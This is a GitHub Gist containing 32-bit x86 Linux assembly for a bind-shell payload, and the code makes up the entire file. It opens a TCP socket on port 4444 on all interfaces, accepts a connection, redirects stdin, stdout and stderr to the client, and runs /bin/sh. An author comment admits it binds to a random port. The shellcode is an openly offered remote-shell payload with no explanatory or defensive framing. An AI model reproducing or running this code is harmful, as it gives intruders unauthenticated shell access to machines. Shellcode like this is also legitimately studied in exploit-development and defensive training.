Last active
January 4, 2019 00:32
-
-
Save retpolanne/300f1b9c3279698256cb3ca48f15390f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # bugs - plugs to random port :/ | |
| # run netstat -tlnp | grep LISTEN before using | |
| .global _start | |
| .section .text | |
| _start: | |
| # socket syscall | |
| mov $0x66, %eax # syscall 102 - socketcall | |
| mov $1, %ebx # socketcall type 1 - socket | |
| push $0 # IPPROTO_IP = 0 | |
| push $1 # SOCK_STREAM = 1 | |
| push $2 # AF_INET = 2 | |
| mov %esp, %ecx # ptr to argument array | |
| int $0x80 # kernel mode | |
| mov %eax, %edx # returned socket fd | |
| # setsockopt syscall | |
| mov $0x66, %eax # syscall 102 - socketcall | |
| mov $14, %ebx # socketcall type 14 - setsockopt | |
| push $4 # sizeof socklen_t | |
| pushl %esp # address of socklen_t - on the stack | |
| push $2 # SO_REUSEADDR = 2 | |
| push $1 # SOL_SOCKET = 1 | |
| pushl %edx # sockfd | |
| mov %esp, %ecx # ptr to argument array | |
| int $0x80 # kernel mode | |
| # bind syscall | |
| mov $0x66, %eax # syscall 102 - socketcall | |
| mov $2, %ebx # socketcall type 2 - bind | |
| push $0 # bind to 0.0.0.0 (INADDR_ANY) | |
| pushw $0x5c11 # little endian 4444 (port) | |
| push $2 # AF_INET = 2 | |
| mov %esp, %ecx # ptr to struct | |
| pushl $16 # sockaddr struct size | |
| pushl %ecx # sockaddr_in struct ptr | |
| pushl %edx # socket fd | |
| mov %esp, %ecx # ptr to argument array | |
| int $0x80 # kernel mode | |
| # listen syscall | |
| mov $0x66, %eax # syscall 102 - socketcall | |
| mov $4, %ebx # socketcall type 4 - listen | |
| push $0 # backlog (queue size) | |
| pushl %edx # socket fd | |
| mov %esp, %ecx # ptr to argument array | |
| int $0x80 # kernel mode | |
| # accept syscall | |
| mov $0x66, %eax # syscall 102 - socketcall | |
| mov $5, %ebx # socketcall type 5 - accept | |
| push $0 # NULL | |
| push $0 # NULL | |
| pushl %edx # socket fd | |
| mov %esp, %ecx # ptr to argument array | |
| int $0x80 # kernel mode | |
| mov %eax, %edx # save returned socket fd (client) | |
| # dup2 syscalls | |
| mov $0x3f, %eax # syscall 64 - dup2 | |
| mov %edx, %ebx # oldfd (client socket fd) | |
| mov $0, %ecx # STDIN fd | |
| int $0x80 # kernel mode | |
| mov $0x3f, %eax # syscall 64 - dup2 | |
| mov $1, %ecx # STDOUT fd | |
| int $0x80 # kernel mode | |
| mov $0x3f, %eax # syscall 64 - dup2 | |
| mov $2, %ecx # STDERR fd | |
| int $0x80 # kernel mode | |
| # execve syscall | |
| mov $0xb, %eax # syscall 11 - execve | |
| push $0 # null byte for /bin/sh string | |
| push $0x68732f2f # little endian //sh | |
| push $0x6e69622f # little endian /bin | |
| mov %esp, %ebx # ptr to /bin//sh string - on the stack | |
| mov $0x00, %ecx # null ptr to argv | |
| mov $0x00, %edx # null ptr to envp | |
| int $0x80 # kernel mode |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment